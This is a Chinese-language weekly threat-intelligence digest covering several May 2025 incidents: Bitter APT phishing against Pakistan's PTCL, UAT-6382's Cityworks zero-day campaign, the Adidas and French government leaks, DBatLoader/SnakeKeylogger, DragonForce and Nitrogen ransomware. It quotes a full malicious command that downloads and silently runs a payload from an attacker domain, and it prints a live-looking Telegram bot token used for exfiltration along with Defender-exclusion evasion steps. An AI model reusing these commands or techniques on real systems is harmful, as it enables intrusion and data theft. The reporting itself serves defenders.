巴基斯坦电信公司（PTCL）遭印度APT组织定向网络攻击——每周威胁情报动态第224期 （05.23-05.29）

巴基斯坦电信公司（PTCL）遭印度APT组织定向网络攻击

2025年5月7日，正值巴基斯坦与印度军事冲突升级之际，特别是在印度实施“Operation Sindoor”军事行动期间，网络安全研究人员监测到，疑似印度支持的黑客组织Bitter APT（又名TA397）针对巴基斯坦电信公司（PTCL）员工发动了鱼叉式网络钓鱼攻击，企图通过恶意软件窃取情报信息。此次攻击目标为PTCL关键岗位人员，包括5G基础设施工程师、DevOps专家、项目经理和卫星通信专家等。

研究发现，Bitter APT组织首先是利用从巴基斯坦反恐部门（CTD）窃取的电子邮件凭证实施了本次攻击。根据Hudson Rock的数据显示，2024年8月13日，由于CTD员工在受StealC信息窃取程序感染的设备上下载盗版软件，其账号密码被盗。早在2022年至2024年间，该员工的设备曾四次被StealC程序感染，2024年的感染事件导致关键邮箱账号暴露，为本次网络攻击埋下祸根。攻击者借此账号向PTCL发送钓鱼邮件，增加了邮件可信度，使目标员工更容易上当。

本次网络钓鱼攻击，攻击者使用被盗的CTD邮箱发送主题为“Security Brief Report”（安全简报报告）的钓鱼邮件，附件为名为 “Security Brief Report.iqy” 的文件。IQY是微软Office的合法文件格式，攻击者借此绕过反恶意软件和邮件网关检测。受害者一旦打开附件后，系统会执行Excel宏，相关命令（cmd|' /c cd C:programdata & set /P="MZ"<nul>b1 & curl -o b2 https://fogomyart[.]com/vcswin & copy /b b1+b2 vcswin.exe & start /b vcswin.exe'!A0）会利用Windows内置的curl.exe从指定链接下载恶意BAT脚本。并利用“MZ”头部（Windows可执行文件签名）拼接生成伪装成PNG图片的可执行文件vcswin.exe，最终在后台静默运行，企图逃避检测。

研究人员发现，攻击者下载的payload是WmRAT的一个新变种，这是一种用于情报收集和数据外泄的远程访问木马程序。该木马的功能包括：

• 获取受害者机器的用户名和主机名

• 枚举逻辑驱动器和目录内容

• 上传和下载文件

• 截取桌面截图

• 获取地理位置信息

• 通过CMD或PowerShell执行命令

• 接收并处理C2服务器的命令

• 支持文件外泄和远程文件流写入

• 获取文件时间戳和磁盘使用信息

WmRAT木马程序通过Windows注册表建立持久性，并从漫游目录中启动一个名为gentwin.exe的二级进程。该进程使用cmd.exe和reg.exe在以下路径添加注册表项：HKCUSoftwareMicrosoftWindowsCurrentVersionRun；注册表项指向C:ProgramData中的vcswin.exe，确保恶意软件在系统启动时运行。

研究人员通过逆向工程分析WmRAT变种后，发现其C2服务器以异或加密字符串形式隐藏在恶意软件的rdata部分中。解密后，C2域名为tradesmarkets[.]greenadelhouse[.]com。被动DNS数据显示，该域名在2025年4月3日和5月7日分别解析的IP地址为185.244.151.84和185.244.151.87，其中IP地址185.244.151.84曾在2024年12月的一次攻击活动中被用于托管域名jacknwoods[.]com，该活动被网络安全厂商Proofpoint记录。Proofpoint将此次攻击活动归因于TA397（也被称为Bitter APT）。此次攻击活动中攻击者所使用的基础设施与之前Bitter APT的攻击活动存在严重重叠，同时结合WmRAT工具和攻击手法的一致性，研究人员可以强有力地支持了将当前活动归因于Bitter APT的判断。

WmRAT木马程序通过HTTPS协议（443 端口）与C2服务器通信。为仿冒正常流量，攻击者使用伪装的URI路径“/excerorderslistoncbook.php”和伪造的User-Agent字符串（模拟过时的IE浏览器）以逃避安全检测。通信参数“vrocean”包含Base64编码的受害者系统标识（如主机名、用户角色、操作系统版本），便于攻击者管理受控设备。一旦完成通信，恶意木马程序便等待攻击者发出远程操作指令。

研究人员认为，此次针对PTCL的网络入侵攻击很可能是Bitter APT组织精心策划的网络间谍活动，旨在利用地区冲突的时机，获取巴基斯坦通信基础设施的深度访问权限。PTCL作为巴基斯坦最大的电信运营商，管理着卫星链路、光纤骨干网和5G部署等关键服务，是国家支持的攻击者寻求战略优势的高价值目标。通过入侵攻击PTCL的工程师、DevOps团队和卫星专家，Bitter APT可能试图实现通信情报收集、网络结构测绘、供应链情报获取、冲突准备和元数据利用等目标。

图 1攻击事件分析示意图

参考链接：

https://blog.eclecticiq.com/pakistan-telecommunication-company-ptcl-targeted-by-bitter-apt-during-heightened-regional-conflict

UAT-6382攻击组织利用Cityworks系统0Day漏洞发动攻击活动

近日，Cisco Talos安全团队披露了一起针对美国地方政府及企业网络的高级持续性威胁（APT）攻击活动，他们命名为“UAT-6382”。该组织利用Cityworks资产管理系统的零日漏洞（CVE-2025-0994），通过部署WebShell和Rust语言编写的恶意加载器（TetraLoader），向受害网络植入Cobalt Strike信标和VShell后门程序，实现对关键目标设施的长期控制。此次攻击活动不仅暴露了漏洞利用的高效性，更凸显了APT攻击组织在攻击工具开发与战术执行上的高度专业化。

Cityworks是一款以地理信息系统（GIS）为核心的资产管理和工单管理软件，主要用于地方政府、公用事业、公共工程、机场等机构的基础设施管理。Cityworks最初由Azteca Systems开发，后被Trimble公司收购。Trimble公司是一家全球知名的科技公司，专注于提供地理空间、建筑、农业和交通等行业的解决方案。

攻击活动始于2025年1月，UAT-6382组织通过Cityworks系统中的远程代码执行漏洞（CVE-2025-0994），向目标服务器发送恶意请求，成功获取系统控制权。初步入侵后，攻击者迅速执行基础命令（如ipconfig、dir等），对服务器环境进行探测，并枚举关键目录（如c:inetpubwwwroot），定位敏感文件并转移至WebShell所在目录以备外泄。随后，攻击者部署了多种WebShell工具，包括AntSword、Chinatso/Chopper及通用文件上传器。

为进一步巩固控制权，UAT-6382攻击组织利用Rust语言开发了恶意加载器TetraLoader，该加载器基于“MaLoader”框架构建。TetraLoader能够解密并注入恶意负载至合法进程（如notepad.exe），进而植入Cobalt Strike信标和VShell后门程序。Cobalt Strike信标用于内网渗透，其配置包含加密通信参数及C2服务器地址（如cdn.lgaircon.xyz）；而VShell后门则基于Go语言开发，提供文件管理、命令执行、屏幕截图等功能。

此次攻击活动的另一显著特征是攻击者对工具链的深度定制与隐蔽性设计。TetraLoader通过PowerShell下载并执行多个恶意程序（如LVLWPH.exe、MCUCAT.exe），这些程序不仅具备高度混淆能力，还通过动态加载技术规避检测。此外，攻击者在C2通信中使用了多层跳板域名（如roomako.com、phototagx.com），并通过加密协议隐藏指令传输，增加了追踪难度。Cobalt Strike是一种被广泛使用的渗透测试工具，在此攻击事件中也被攻击者重点利用。其信标能够与攻击者控制的服务器进行通信，接收指令并执行恶意操作。而VShell阶段器则是一种更为复杂的工具，它通过与硬编码的C2服务器通信，接收并执行加密的恶意代码，进一步扩大攻击者的控制范围。

此次攻击事件的复杂性和隐蔽性极高，攻击者不仅利用了0Day漏洞，还结合了多种先进的攻击技术和工具。通过对攻击过程的深入分析，可以发现攻击者具有明确的目标和清晰的攻击路径，显示出其高度的组织性和专业性。

参考链接：

https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/

阿迪达斯（Adidas）确认遭遇网络攻击，客户数据遭窃取

全球知名运动服装巨头阿迪达斯（Adidas）近日确认，该公司遭受了一起严重的网络攻击事件，导致客户数据被盗。此次事件中，攻击者获取了包括联系信息和账户凭据在内的个人详细信息。尽管阿迪达斯尚未披露受影响客户的具体数量，但公司已建议用户立即重置密码，并密切关注其账户的异常活动。

阿迪达斯在声明中表示：“受影响的数据不包含密码、信用卡或任何其他与支付相关的信息，主要涉及过去联系过我们客户服务中心的消费者的联系信息。”然而，此次事件仍然引发了广泛关注，尤其是在零售行业网络攻击日益频繁的背景下。

目前，阿迪达斯尚未确认攻击源头，暂未明确是否为钓鱼攻击、系统漏洞或第三方供应商泄露所致。不过，随着人工智能（AI）驱动的攻击技术日益普及，该事件已被纳入近期众多大型零售商遭袭的案例序列，反映出黑客利用AI强化钓鱼活动、自动化漏洞利用及精准规避检测的趋势。

Armis Labs数据显示，近半数零售企业因复杂的合规要求而倍感压力，49%的企业承认曾遭黑客入侵，且仍在努力保障数字生态系统安全。尽管今年近80%的零售企业将“主动网络安全”列为首要议程，82%的企业表示员工知晓如何上报可疑活动，但仅有46%的企业具备实时检测和响应重大攻击的能力，暴露出防御滞后与攻击技术进化之间的显著差距。

参考链接：

https://hackread.com/adidas-confirms-cyber-attack-customer-data-stolen/

法国政府电子邮件数据遭大规模泄露

据网络安全媒体Cybernews报道，知名勒索软件团伙“Stormous”在暗网论坛宣称泄露了法国多个政府机构及组织的电子邮件和密码，此次泄露涉及法国发展署、巴黎大区卫生署、审计法院等多个高知名度政府机构，尽管泄露数据的真实性和时效性存疑，但已引发对政府机构数据安全和密码管理的广泛讨论。

攻击者公布的数据集包含法国发展署、巴黎大区卫生署、家庭津贴基金、审计法院及农业信贷银行地区分行等机构的电子邮件地址、用户密码（采用 MD5 哈希算法加密）和部分机构内部账号。研究人员验证发现，数据中确实包含上述机构的真实邮箱，但密码哈希强度较低，部分密码仅通过简单MD5加密，存在被暴力破解的风险。研究人员推测，此次泄露可能为历史数据，如2018年前未更新的旧系统数据，因为部分机构近年已逐步淘汰MD5加密，但即便如此，若用户存在密码复用行为，仍可能导致跨平台攻击，而且攻击者可利用真实机构邮箱发起钓鱼邮件，伪装成“审计通知”“补贴核查” 等官方通信，诱使用户点击恶意链接或泄露更多信息，结合泄露的机构名称和邮箱格式，此类钓鱼邮件的可信度较高。

法国近年多次发生大规模数据泄露事件，2024年某公共数据库暴露9500万条公民记录，2023年多个地方政府网站因弱密码漏洞遭黑客入侵，此次Stormous组织的攻击延续了其针对政府和关键基础设施的一贯策略，该组织自2022年活跃至今，已在过去12个月内攻击至少34家机构，包括比利时杜佛摩盖特啤酒厂等跨国企业，显示出成熟的渗透能力和数据勒索模式。尽管本次攻击事件具体入侵方式不明，但可能的攻击路径包括攻击未更新的旧系统、通过入侵第三方供应商间接获取政府机构权限以及低权限员工账号被社工攻击攻陷导致凭证批量外流等。

法国网络安全局（ANSSI）尚未就此次泄露正式回应，但根据历史惯例，可能会要求涉事机构立即核查邮箱账号状态，强制用户重置密码，对政府系统进行全面安全审计，尤其是仍使用MD5加密的旧平台，并通过“全国公共服务网络安全计划”推动密码策略升级，强制采用SHA-256等现代哈希算法。对于个人用户，若曾向涉事机构提交过邮箱，应立即检查相关账户登录日志，启用双因素认证，避免在不同平台复用同一密码，使用密码管理器生成强密码；对于政府与企业，应实施“零信任”架构，对内部系统访问进行多因素认证和实时行为监控，开展密码哈希算法升级计划，优先淘汰 MD5/SHA-1，采用PBKDF2、bcrypt或Argon2，加强暗网监控，通过威胁情报平台追踪攻击组织动态，提前预警攻击。

参考链接：

https://cybernews.com/security/french-government-email-data-leak/

土耳其用户遭遇DBatLoader（ModiLoader）恶意软件攻击

近日，网络安全研究人员发现一起针对土耳其用户的网络攻击事件，攻击者通过钓鱼邮件传播DBatLoader（又名ModiLoader）恶意软件，最终在目标设备上植入SnakeKeylogger键盘记录器，旨在窃取用户敏感信息。

此次攻击中，攻击者精心伪装钓鱼邮件，以“账户交易记录”为诱饵诱导用户点击。邮件以土耳其银行名义发送，主题为“Hesap hareketleriniz”（您的账户交易记录），声称附件包含2024年1月25日至2025年3月26日的账户交易详情及余额信息，内附名为“Hesap hareketleriniz.rar”的压缩文件。用户一旦打开该压缩包，其中名为“Hesap hareketleriniz.bat”的BAT脚本就会被触发运行，在%temp%目录生成Base64编码的DBatLoader恶意程序“x.exe”。该脚本通过混淆代码等手段绕过基础安全检测，并利用Windows脚本组件解码执行二进制文件，完成初始感染。

DBatLoader在入侵系统后，采取了一系列检测规避措施。它在C:WindowsSysWOW64目录创建名为“svchost.pif”的程序，伪装成合法进程“easinvoker.exe”（Exchange ActiveSync Invoker），同时释放恶意动态链接库“netutils.dll”实施DLL侧加载，使合法进程执行恶意代码，以此掩盖自身的恶意行为。攻击者还通过“esentutl”命令复制cmd.exe为“alpha.pif”，并利用“mkdir”创建带空格的伪造路径，如“C:Windows ”，混淆安全软件对恶意文件的识别。此外，执行“neo.cmd”脚本时，通过“extrac32”命令将powershell.exe重命名为“xkn.pif”，并添加“C:”目录到Windows Defender排除列表，阻止安全软件扫描。为确保恶意组件加载完成，还使用“ping 127.0.0.1 -n 10”引入10秒延迟，之后再删除临时文件，进一步降低被实时监控拦截的概率。

在完成一系列准备后，DBatLoader在合法进程“wxiygomE.pif”（Mercury/32邮件客户端加载模块）中注入SnakeKeylogger键盘记录器。这款基于.NET开发的恶意软件功能多样，能够监控用户输入的账号、密码等键盘记录信息，获取复制到剪贴板的文本数据，定时截取桌面屏幕截图，以及窃取主机名、IP地址、操作系统版本等系统信息。在数据外泄方面，攻击者配置了Telegram机器人令牌（TG_Access: 8135369946:AAEGf2H0ErFZIOLbSXn5AVeBr_xgB-x1Qmk），通过Telegram API将窃取到的数据发送至指定聊天ID（7009913093），以此实现与控制服务器的通信和数据传输。

从技术特征来看，DBatLoader（x.exe）的哈希值为 7fa27c24b89cdfb47350ecfd70e30e93，SnakeKeylogger模块的哈希值为 a0a35155c0daf2199215666b00b9609c。C2通信则通过Telegram API URL：https [:]//api [.] telegram [.] org/bot8135369946 [:] AAEGf2H0ErFZIOLbSXn5AVeBr_xgB-x1Qmk/sendDocument?chat_id=7009913093进行。攻击过程中，还存在进程伪装情况，如“svchost.pif”伪装合法进程 “easinvoker.exe”、“wxiygomE.pif”伪装合法程序“loader.exe”，同时有新增Windows Defender排除路径、DLL侧加载等敏感操作。

面对如此复杂的攻击手段，研究人员提醒广大用户和组织务必提高警惕，加强安全防护。一方面，要警惕来自未知来源的邮件附件，特别是那些伪装成合法文件的可疑文件；另一方面，要定期更新安全产品，及时修复已知漏洞，以应对不断变化的网络威胁。此外，还要加强员工培训、提高安全意识也是防范此类攻击的重要措施之一。

参考链接：

https://asec.ahnlab.com/en/88025/

DragonForce勒索软件组织利用多个漏洞定向攻击MSP及其客户

2025年5月，网络安全研究人员发现一起针对托管服务提供商（MSP）的定向攻击事件。攻击者通过入侵MSP的远程监控与管理（RMM）工具SimpleHelp，向多个终端部署了DragonForce勒索软件，并窃取了敏感数据，利用双重勒索手段迫使受害者支付赎金。研究人员认为，攻击者在本次攻击活动中很可能利用了SimpleHelp在2025年1月公布的漏洞链，包括：

• CVE-2024-57727：多个路径遍历漏洞

• CVE-2024-57728：任意文件上传漏洞

• CVE-2024-57726：权限提升漏洞

DragonForce勒索软件是一种先进且具有竞争力的勒索软件即服务（RaaS）品牌，于2023年中期首次出现。根据Sophos威胁对抗部门（CTU）的最新研究，DragonForce勒索软件在2024年3月开始重新定位自身为一个“勒索软件联盟”，并转向分布式附属品牌模式，以吸引更广泛的攻击者群体。DragonForce勒索软件近期因声称“接管”了RansomHub的基础设施而受到关注。据报道，知名勒索软件附属团队（如Scattered Spider，即UNC3944，曾是RansomHub的附属团队）已使用DragonForce勒索软件攻击了英国和美国的多家大型零售连锁企业。

以上漏洞未及时修复，成为本次攻击事件中攻击者入侵MSP的RMM工具（由MSP托管并用于管理客户设备）的关键突破口。DragonForce勒索软件攻击者通过合法的SimpleHelp RMM实例推送恶意安装程序，利用MSP对客户网络的管理权限，批量获取客户资产信息，包括：

• 设备名称与配置（如操作系统版本、硬件信息）；

• 用户账户列表；

• 网络连接拓扑与服务端口。

凭借这些信息，DragonForce勒索软件攻击者精准定位高价值目标，通过RMM工具直接向客户端点部署DragonForce勒索软件，实现跨客户网络的横向扩散。

参考链接：

https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/

新型Nitrogen勒索软件瞄准美、英、加金融企业

2025年5月，一种名为Nitrogen的勒索软件正以金融行业为重点目标，在全球范围内发起攻击，主要波及美国、英国和加拿大等国家。该勒索软件自2024年9月首次被发现以来，凭借其复杂的攻击手法和破坏性影响迅速引发关注。攻击者通过加密关键数据并索要高额赎金，已对金融、建筑、制造和科技等多个行业造成严重威胁。

Nitrogen勒索软件的攻击链极为复杂，通常从搜索引擎（如谷歌和必应）上的恶意广告活动开始。这些广告诱骗用户下载伪装成合法软件（如 AnyDesk、WinSCP或Cisco AnyConnect）的特种木马安装程序。安装完成后，勒索软件利用Cobalt Strike和Meterpreter等工具建立持久性，横向移动以感染网络中的其他设备，并执行其加密载荷。Nitrogen勒索软件会修改注册表项、安排计划任务以确保其在系统重启后仍然保持活跃。它还会进行全面的系统侦察，识别网络中的高价值目标以最大化攻击影响，并运用高级逃避技术绕过安全检测。

目前SRP联邦信用合作社（美国）、Red Barrels（加拿大）、Control Panels USA、Kilgore Industries等多家单位成为Nitrogen勒索软件的受害者。

参考链接：

https://hackread.com/nitrogen-ransomware-targets-financial-firms-us-uk-canada/